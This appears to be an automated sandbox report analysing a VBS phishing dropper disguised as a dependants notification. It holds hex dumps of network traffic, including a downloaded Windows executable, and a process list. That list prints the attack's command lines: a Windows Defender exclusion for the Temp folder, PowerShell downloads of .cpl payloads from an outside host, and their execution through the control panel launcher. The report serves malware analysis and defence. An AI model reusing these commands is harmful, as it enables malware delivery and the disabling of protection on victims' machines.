                                                                                                                                              2024-12-19 06:52:34 UTC16384INData Raw: 9b 85 cc 6a c5 a4 25 08 35 75 06 ca 41 0a 84 73 6a 0d 82 9f 36 a0 2d c8 82 d0 83 ce 41 35 88 fb 53 16 7e 39 a6 64 51 33 c7 24 72 09 42 ef 79 05 62 87 6c 1d e7 c9 27 53 eb a8 ad 98 b6 31 8f 1d e4 16 35 0d cf 2c db e2 9c 56 81 30 17 cb 0e 59 19 27 c1 0e b2 84 83 a9 40 e8 dd d4 88 8c 55 e0 57 a2 23 6b bf ff 9a a9 10 ad d8 53 56 38 9d c1 84 23 29 ae 64 ea b8 25 d0 ea 06 c4 5b 62 1a f4 a1 b0 09 4d f4 b4 20 cc d4 e6 bc 8c 71 eb 96 b5 0c b7 47 fc ec 7c 77 f5 3e ac 3b 5f 31 de f3 65 c3 07 47 3f b7 70 1a 27 11 b2 96 37 f9 02 00 00 ff ff 00 00 00 ff ff 03 00 b3 a2 e6 f7 0d 65 6e 64 73 74 72 65 61 6d 0d 65 6e 64 6f 62 6a 0d 39 39 31 20 30 20 6f 62 6a 0d 3c 3c 2f 42 42 6f 78 5b 30 2e 30 20 30 2e 30 20 31 37 37 2e 38 34 20 31 33 2e 32 5d 2f 46 6f 72 6d 54 79 70 65 20
                                                                                                                                              Data Ascii: j%5uAsj6-A5S~9dQ3$rBybl'S15,V0Y'@UW#kSV8#)d%[bM qG|w>;_1eG?p'7endstreamendobj991 0 obj<</BBox[0.0 0.0 177.84 13.2]/FormType
                                                                                                                                              2024-12-19 06:52:34 UTC14808INData Raw: 4d 61 74 72 69 78 5b 31 2e 30 20 30 2e 30 20 30 2e 30 20 31 2e 30 20 30 2e 30 20 30 2e 30 5d 2f 52 65 73 6f 75 72 63 65 73 3c 3c 2f 50 72 6f 63 53 65 74 5b 2f 50 44 46 5d 3e 3e 2f 53 75 62 74 79 70 65 2f 46 6f 72 6d 2f 54 79 70 65 2f 58 4f 62 6a 65 63 74 3e 3e 73 74 72 65 61 6d 0d 0a 2f 54 78 20 42 4d 43 20 0a 45 4d 43 0a 0d 65 6e 64 73 74 72 65 61 6d 0d 65 6e 64 6f 62 6a 0d 31 30 37 38 20 30 20 6f 62 6a 0d 3c 3c 2f 42 42 6f 78 5b 30 2e 30 20 30 2e 30 20 35 34 2e 30 20 31 31 2e 35 32 5d 2f 46 6f 72 6d 54 79 70 65 20 31 2f 4c 65 6e 67 74 68 20 31 33 2f 4d 61 74 72 69 78 5b 31 2e 30 20 30 2e 30 20 30 2e 30 20 31 2e 30 20 30 2e 30 20 30 2e 30 5d 2f 52 65 73 6f 75 72 63 65 73 3c 3c 2f 50 72 6f 63 53 65 74 5b 2f 50 44 46 5d 3e 3e 2f 53 75 62 74 79 70 65 2f 46
                                                                                                                                              Data Ascii: Matrix[1.0 0.0 0.0 1.0 0.0 0.0]/Resources<</ProcSet[/PDF]>>/Subtype/Form/Type/XObject>>stream/Tx BMC EMCendstreamendobj1078 0 obj<</BBox[0.0 0.0 54.0 11.52]/FormType 1/Length 13/Matrix[1.0 0.0 0.0 1.0 0.0 0.0]/Resources<</ProcSet[/PDF]>>/Subtype/F
                                                                                                                                              2024-12-19 06:52:34 UTC16384INData Raw: 3e 2f 53 75 62 74 79 70 65 2f 46 6f 72 6d 2f 54 79 70 65 2f 58 4f 62 6a 65 63 74 3e 3e 73 74 72 65 61 6d 0d 0a 2f 54 78 20 42 4d 43 20 0a 45 4d 43 0a 0d 65 6e 64 73 74 72 65 61 6d 0d 65 6e 64 6f 62 6a 0d 31 31 36 30 20 30 20 6f 62 6a 0d 3c 3c 2f 42 42 6f 78 5b 30 2e 30 20 30 2e 30 20 35 34 2e 30 20 31 31 2e 36 34 5d 2f 46 6f 72 6d 54 79 70 65 20 31 2f 4c 65 6e 67 74 68 20 31 33 2f 4d 61 74 72 69 78 5b 31 2e 30 20 30 2e 30 20 30 2e 30 20 31 2e 30 20 30 2e 30 20 30 2e 30 5d 2f 52 65 73 6f 75 72 63 65 73 3c 3c 2f 50 72 6f 63 53 65 74 5b 2f 50 44 46 5d 3e 3e 2f 53 75 62 74 79 70 65 2f 46 6f 72 6d 2f 54 79 70 65 2f 58 4f 62 6a 65 63 74 3e 3e 73 74 72 65 61 6d 0d 0a 2f 54 78 20 42 4d 43 20 0a 45 4d 43 0a 0d 65 6e 64 73 74 72 65 61 6d 0d 65 6e 64 6f 62 6a 0d 31
                                                                                                                                              Data Ascii: >/Subtype/Form/Type/XObject>>stream/Tx BMC EMCendstreamendobj1160 0 obj<</BBox[0.0 0.0 54.0 11.64]/FormType 1/Length 13/Matrix[1.0 0.0 0.0 1.0 0.0 0.0]/Resources<</ProcSet[/PDF]>>/Subtype/Form/Type/XObject>>stream/Tx BMC EMCendstreamendobj1


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              4192.168.2.94972545.125.67.1684438440C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-12-19 06:52:46 UTC176OUTGET /stelin/Gosjeufon.cpl HTTP/1.1
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                              Host: kiltone.top
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              2024-12-19 06:52:47 UTC253INHTTP/1.1 200 OK
                                                                                                                                              Server: nginx/1.18.0
                                                                                                                                              Date: Thu, 19 Dec 2024 06:52:46 GMT
                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                              Content-Length: 902856
                                                                                                                                              Last-Modified: Wed, 18 Dec 2024 23:38:35 GMT
                                                                                                                                              Connection: close
                                                                                                                                              ETag: "67635cfb-dc6c8"
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              2024-12-19 06:52:47 UTC16131INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 84 7b 68 8b c0 1a 06 d8 c0 1a 06 d8 c0 1a 06 d8 b3 78 05 d9 d2 1a 06 d8 b3 78 03 d9 72 1a 06 d8 b3 78 02 d9 d7 1a 06 d8 92 6f 02 d9 d1 1a 06 d8 92 6f 05 d9 d8 1a 06 d8 92 6f 03 d9 9f 1a 06 d8 0a 6f 03 d9 e9 1a 06 d8 b3 78 00 d9 c1 1a 06 d8 b3 78 07 d9 cf 1a 06 d8 c0 1a 07 d8 71 1a 06 d8 0a 6f 0f d9 c1 1a 06 d8 0a 6f f9 d8 c1 1a 06 d8 c0 1a 91 d8 c1 1a 06 d8 0a 6f 04 d9 c1 1a 06
                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.${hxxrxooooxxqooo
                                                                                                                                              2024-12-19 06:52:47 UTC16384INData Raw: 08 c7 45 fc 00 00 00 00 8d 4e 10 c7 06 9c b3 48 00 c7 46 0c 04 00 00 00 e8 c0 17 01 00 c7 06 4c bc 48 00 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5e 8b e5 5d c2 04 00 cc cc cc cc cc cc 55 8b ec 6a ff 68 dd 33 48 00 64 a1 00 00 00 00 50 51 56 a1 34 61 4b 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b f1 89 75 f0 0f 57 c0 66 0f d6 46 04 ff 75 08 c7 45 fc 00 00 00 00 8d 4e 10 c7 06 9c b3 48 00 c7 46 0c 00 00 00 00 e8 50 17 01 00 c7 06 b4 b3 48 00 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5e 8b e5 5d c2 04 00 cc cc cc cc cc cc 55 8b ec 6a ff 68 dd 33 48 00 64 a1 00 00 00 00 50 51 56 a1 34 61 4b 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b f1 89 75 f0 0f 57 c0 66 0f d6 46 04 ff 75 08 c7 45 fc 00 00 00 00 8d 4e 10 c7 06 9c b3 48 00 c7 46 0c 02 00 00 00 e8 e0 16 01 00 c7 06
                                                                                                                                              Data Ascii: ENHFLHMdY^]Ujh3HdPQV4aK3PEduWfFuENHFPHMdY^]Ujh3HdPQV4aK3PEduWfFuENHF
                                                                                                                                              2024-12-19 06:52:47 UTC16384INData Raw: 45 fc 02 00 00 00 50 8b cf e8 ef 02 00 00 8d 77 18 50 8b ce e8 04 d7 00 00 8b 95 a4 fe ff ff 83 fa 10 72 2f 8b 8d 90 fe ff ff 42 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 9a 02 00 00 52 51 e8 68 4e 05 00 83 c4 08 83 7e 14 10 72 02 8b 36 ff 77 28 8b 85 00 ff ff ff 8d 8d 00 ff ff ff 56 ff 50 10 8d 45 cc 50 8b 85 00 ff ff ff 8d 8d 00 ff ff ff ff 50 18 6a 4c 8d 85 b0 fe ff ff 6a 00 50 e8 ec 6b 05 00 83 c4 0c c7 85 90 fe ff ff 00 00 00 00 8d 8d 90 fe ff ff c7 85 a0 fe ff ff 00 00 00 00 c7 85 a4 fe ff ff 0f 00 00 00 c6 85 90 fe ff ff 00 6a 00 68 5b 38 4a 00 e8 a2 fb 00 00 c6 45 fc 03 8d 8d 74 fe ff ff 6a 01 c7 85 74 fe ff ff 00 00 00 00 68 bc 3d 4a 00 c7 85 84 fe ff ff 00 00 00 00 c7 85 88 fe ff ff 0f 00 00 00 c6 85 74 fe ff
                                                                                                                                              Data Ascii: EPwPr/BrI#+RQhN~r6w(VPEPPjLjPkjh[8JEtjth=Jt
                                                                                                                                              2024-12-19 06:52:47 UTC16384INData Raw: 8d 14 fb ff ff 8b 85 00 fb ff ff 47 57 89 bd 48 e7 ff ff 8b 40 04 03 c8 8b 01 25 ff f9 ff ff 0d 00 08 00 00 89 01 8d 8d 00 fb ff ff e8 ec 91 00 00 8d 45 b8 50 8d 8d f0 fa ff ff e8 1d 64 00 00 6a 5c 8d 85 88 fe ff ff c6 45 fc 0e 6a 00 50 e8 29 2c 05 00 83 c4 0c 8d 8d 88 fe ff ff e8 6b 52 00 00 c7 85 70 ff ff ff 00 00 00 00 c7 45 80 00 00 00 00 c7 45 84 0f 00 00 00 c6 85 70 ff ff ff 00 c6 45 fc 10 8b 8d 90 fe ff ff ff 35 00 60 4b 00 6a 10 8b 01 ff b5 24 ff ff ff ff 50 18 8d 8d 88 fe ff ff e8 b4 41 03 00 6a 78 e8 87 0b 05 00 8b f8 83 c4 04 89 bd 44 e7 ff ff 6a 78 6a 00 57 c6 45 fc 11 e8 b4 2b 05 00 83 c4 0c 6a 10 e8 64 0b 05 00 8b f0 83 c4 04 89 b5 50 e7 ff ff 0f 57 c0 c6 45 fc 12 6a 00 8b ce 0f 11 06 e8 6c 50 01 00 8d 85 70 ff ff ff c7 06 18 dd 48 00 c7 46
                                                                                                                                              Data Ascii: GWH@%EPdj\EjP),kRpEEpE5`Kj$PAjxDjxjWE+jdPWEjlPpHF
                                                                                                                                              2024-12-19 06:52:47 UTC16384INData Raw: 8d 8d 88 fe ff ff e8 e2 55 00 00 8d 85 88 fe ff ff c6 45 fc 2c 50 8d 4d e4 e8 5f 0d 00 00 8d 8d 88 fe ff ff c6 45 fc 13 e8 60 55 00 00 68 a0 55 4a 00 8d 8d 88 fe ff ff e8 b0 55 00 00 8d 85 88 fe ff ff c6 45 fc 2d 50 8d 4d e4 e8 2d 0d 00 00 8d 8d 88 fe ff ff c6 45 fc 13 e8 2e 55 00 00 8d 4d e4 33 f6 e8 f4 0c 00 00 85 c0 74 6b ba a8 55 4a 00 b9 38 cf 4b 00 e8 e1 96 00 00 50 e8 fb 9e 00 00 83 ec 14 8d 45 9c 8b cc 89 a5 84 fe ff ff 50 e8 47 57 00 00 83 ec 40 c6 45 fc 2e 8b cc 8d 85 fc fe ff ff 6a 01 50 e8 d0 8b ff ff 56 8d 4d e4 e8 87 0c 00 00 8b c8 e8 c0 54 00 00 8b c8 c6 45 fc 13 e8 95 d3 ff ff 83 c4 58 8d 4d e4 46 e8 89 0c 00 00 3b f0 72 95 8d 8d a0 fe ff ff e8 7a 00 00 00 8d 4d b4 e8 f2 0b 00 00 8d 4d 84 e8 9a 54 00 00 8d 8d 6c ff ff ff e8 8f 54 00 00 8d
                                                                                                                                              Data Ascii: UE,PM_E`UhUJUE-PM-E.UM3tkUJ8KPEPGW@E.jPVMTEXMF;rzMMTlT
                                                                                                                                              2024-12-19 06:52:47 UTC16384INData Raw: 7c 72 8b 5d 0c 7f 04 85 db 74 69 c6 45 fc 02 50 8b 06 53 ff 75 08 8b 48 04 8b 4c 31 38 e8 8b 35 00 00 89 46 08 89 56 0c 3b c3 75 05 3b 55 10 74 3c bf 03 00 00 00 eb 35 8b 4d ec 6a 01 8b 01 8b 70 04 b8 04 00 00 00 03 f1 33 c9 8b 56 0c 83 ca 04 39 4e 38 0f 45 c1 8b ce 0b c2 50 e8 7c d7 fe ff b8 6a 4b 41 00 c3 8b 75 ec 8b 7d e8 c7 45 fc 01 00 00 00 8b 06 6a 00 8b 48 04 b8 04 00 00 00 03 ce 8b 51 0c 0b d7 33 ff 39 79 38 0f 45 c7 0b c2 50 e8 46 d7 fe ff c7 45 fc 04 00 00 00 8b 06 8b 40 04 8b 4c 30 38 85 c9 74 05 8b 01 ff 50 08 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 0c 00 cc cc cc cc cc cc cc 8b 41 e8 8b 40 04 c7 44 08 e8 d4 5e 4a 00 8b 41 e8 8b 50 04 8d 42 e8 89 44 0a e4 c3 cc cc cc cc 55 8b ec 83 e4 f8 83 ec 1c 8b 45 10 53 8b 5d 0c 03 5d
                                                                                                                                              Data Ascii: |r]tiEPSuHL185FV;u;Ut<5Mjp3V9N8EP|jKAu}EjHQ39y8EPFE@L08tPMdY_^[]A@D^JAPBDUES]]
                                                                                                                                              2024-12-19 06:52:47 UTC16384INData Raw: 0c 8b 75 14 83 f8 ff 75 04 c6 45 10 01 83 ef 01 75 bb 8b 45 fc 5b 8b 4d 10 5f 89 70 04 89 08 5e 8b e5 5d c3 cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 08 8b 45 0c 53 8b 5d 18 56 8b 75 14 57 8b 7d 1c 89 45 f8 85 ff 74 55 0f 1f 40 00 85 f6 74 40 8b 46 20 8a 0b 88 4d ff 83 38 00 74 20 8b 56 30 8b 02 85 c0 7e 17 48 89 02 8b 4e 20 8b 11 8d 42 01 89 01 8a 45 ff 88 02 0f b6 c0 eb 0b 8b 16 0f b6 c1 8b ce 50 ff 52 0c 8b 75 14 83 f8 ff 75 04 c6 45 10 01 43 83 ef 01 75 b2 8b 45 f8 8b 4d 10 5f 89 70 04 5e 89 08 5b 8b e5 5d c3 55 8b ec 6a ff 68 e5 55 48 00 64 a1 00 00 00 00 50 83 ec 4c a1 34 61 4b 00 33 c5 89 45 f0 53 56 57 50 8d 45 f4 64 a3 00 00 00 00 8b 7d 24 8b 45 0c 8b 4d 18 8b 5d 20 89 45 a8 89 4d ac 85 ff 74 11 8a 03 3c 2b 74 04 3c 2d 75 07 be 01 00 00 00 eb 02
                                                                                                                                              Data Ascii: uuEuE[M_p^]UES]VuW}EtU@t@F M8t V0~HN BEPRuuECuEM_p^[]UjhUHdPL4aK3ESVWPEd}$EM] EMt<+t<-u
                                                                                                                                              2024-12-19 06:52:47 UTC16384INData Raw: 8b c3 5f 5e 5b 8b e5 5d c2 0c 00 8b 45 fc 2b c8 3b d1 77 59 0f 10 07 40 50 0f 11 03 f3 0f 7e 47 10 66 0f d6 43 10 c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 8b 3b 57 8d 04 17 50 e8 ba 26 04 00 83 c4 0c 83 7e 14 10 72 02 8b 36 8b 4d f4 51 56 57 e8 a4 26 04 00 8b 45 f8 83 c4 0c 89 43 10 8b c3 5f 5e 5b 8b e5 5d c2 0c 00 b8 ff ff ff 7f 2b c2 3b 45 fc 0f 82 c0 00 00 00 8b 45 f8 83 c8 0f 3d ff ff ff 7f 76 07 b8 ff ff ff 7f eb 0a b9 16 00 00 00 3b c1 0f 42 c1 33 c9 89 45 ec 83 c0 01 0f 92 c1 f7 d9 0b c8 81 f9 00 10 00 00 72 26 8d 41 23 3b c1 0f 86 85 00 00 00 50 e8 74 0b 04 00 83 c4 04 85 c0 74 7d 8b 55 f4 8d 48 23 83 e1 e0 89 41 fc eb 19 85 c9 74 13 51 e8 55 0b 04 00 8b 55 f4 83 c4 04 8b c8 89 45 f0 eb 05 33 c9 89 4d f0 8b 45 f8 89 43 10 8b 45 ec 89 0b
                                                                                                                                              Data Ascii: _^[]E+;wY@P~GfCGG;WP&~r6MQVW&EC_^[]+;EE=v;B3Er&A#;Ptt}UH#AtQUUE3MECE
                                                                                                                                              2024-12-19 06:52:47 UTC16384INData Raw: 8b 4d ec 8b f0 ff 75 d4 8b 3e e8 7e 09 00 00 50 ff 75 f0 8b ce ff 75 e8 ff 57 10 8b 55 c8 39 55 c4 8b 75 cc 8b fe 0f 42 55 c4 33 c0 c6 45 fc 0d 8b ca f3 ab 56 85 d2 74 07 e8 ff a3 02 00 eb 05 e8 68 a4 02 00 83 c4 04 8b 55 f0 32 c0 8b fa c7 45 fc 0e 00 00 00 8b cb f3 aa 52 e8 4d a4 02 00 8b 45 e8 83 c4 04 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b 8d e8 00 00 00 33 cd e8 8e c9 03 00 8d a5 ec 00 00 00 5d c2 18 00 8b 03 6a 0a ff 50 10 50 8d 85 d0 00 00 00 50 e8 2e f7 ff ff 8b f8 6a 0a 8d 85 90 00 00 00 c7 45 fc 00 00 00 00 56 50 e8 16 f7 ff ff 83 c4 18 8b f0 8b 43 04 8d 4b 04 8d 55 78 c6 45 fc 01 52 ff 50 08 68 b0 bb 48 00 50 8d 45 60 c6 45 fc 02 50 e8 5d 9a ff ff 56 50 8d 45 48 c6 45 fc 03 50 e8 9e 9a ff ff 68 88 bb 48 00 50 8d 45 30 c6 45 fc 04 50 e8 3b
                                                                                                                                              Data Ascii: Mu>~PuuWU9UuBU3EVthU2ERMEMdY_^[3]jPPP.jEVPCKUxERPhHPE`EP]VPEHEPhHPE0EP;
                                                                                                                                              2024-12-19 06:52:47 UTC16384INData Raw: 88 5f 08 8b 75 08 8b ce 57 c6 45 fc 00 e8 ab e9 01 00 8b 4d e8 c7 45 fc 03 00 00 00 85 c9 74 06 8b 11 6a 01 ff 12 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 cc cc cc 56 8b f1 e8 e8 11 fe ff f6 44 24 08 01 74 0b 6a 14 56 e8 64 8e 03 00 83 c4 08 8b c6 5e c2 04 00 f6 44 24 04 01 56 8b f1 c7 06 7c bc 48 00 74 0b 6a 0c 56 e8 43 8e 03 00 83 c4 08 8b c6 5e c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 57 68 08 72 4b 00 68 20 6c 4b 00 8b f1 e8 06 a3 03 00 8b 7c 24 1c 83 c4 08 85 c0 75 15 8d 46 10 50 57 ff 74 24 18 e8 14 29 00 00 83 c4 0c 84 c0 75 1a ff 74 24 10 68 1c 6c 4b 00 ff 74 24 14 e8 0b 04 fe ff 8a 46 10 83 c4 0c 88 07 5f 5e c2 0c 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 57 68 08 72 4b 00 68 10 6c 4b 00 8b f1 e8 a6 a2 03
                                                                                                                                              Data Ascii: _uWEMEtjMdY_^[]VD$tjVd^D$V|HtjVC^VWhrKh lK|$uFPWt$)ut$hlKt$F_^VWhrKhlK


                                                                                                                                              Click to jump to process

                                                                                                                                              Click to jump to process

                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                              Click to jump to process

                                                                                                                                              Target ID:0
                                                                                                                                              Start time:01:52:15
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs"
                                                                                                                                              Imagebase:0x7ff695840000
                                                                                                                                              File size:170'496 bytes
                                                                                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:2
                                                                                                                                              Start time:01:52:15
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
                                                                                                                                              Imagebase:0x7ff760310000
                                                                                                                                              File size:452'608 bytes
                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:3
                                                                                                                                              Start time:01:52:15
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                              File size:862'208 bytes
                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:6
                                                                                                                                              Start time:01:52:19
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
                                                                                                                                              Imagebase:0x7ff710660000
                                                                                                                                              File size:289'792 bytes
                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:7
                                                                                                                                              Start time:01:52:19
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                              File size:862'208 bytes
                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:8
                                                                                                                                              Start time:01:52:19
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
                                                                                                                                              Imagebase:0x7ff760310000
                                                                                                                                              File size:452'608 bytes
                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:10
                                                                                                                                              Start time:01:52:21
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
                                                                                                                                              Imagebase:0x7ff6b2cb0000
                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                              MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:false

                                                                                                                                              Target ID:11
                                                                                                                                              Start time:01:52:22
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl
                                                                                                                                              Imagebase:0x7ff710660000
                                                                                                                                              File size:289'792 bytes
                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:12
                                                                                                                                              Start time:01:52:22
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                              File size:862'208 bytes
                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:13
                                                                                                                                              Start time:01:52:22
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl
                                                                                                                                              Imagebase:0x7ff760310000
                                                                                                                                              File size:452'608 bytes
                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:14
                                                                                                                                              Start time:01:52:22
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                              Imagebase:0x7ff77afe0000
                                                                                                                                              File size:55'320 bytes
                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:false

                                                                                                                                              Target ID:15
                                                                                                                                              Start time:01:52:22
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1968,i,893854031444722529,491245764455977091,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                              Imagebase:0x7ff6b2cb0000
                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                              MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Has exited:false

                                                                                                                                              Target ID:17
                                                                                                                                              Start time:01:52:30
                                                                                                                                              Start date:19/12/2024
                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c control C:\Users\user\AppData\Local\Temp/fjeljies.cpl
                                                                                                                                              Imagebase:0x7ff710660000
                                                                                                                                              File size:289'792 bytes
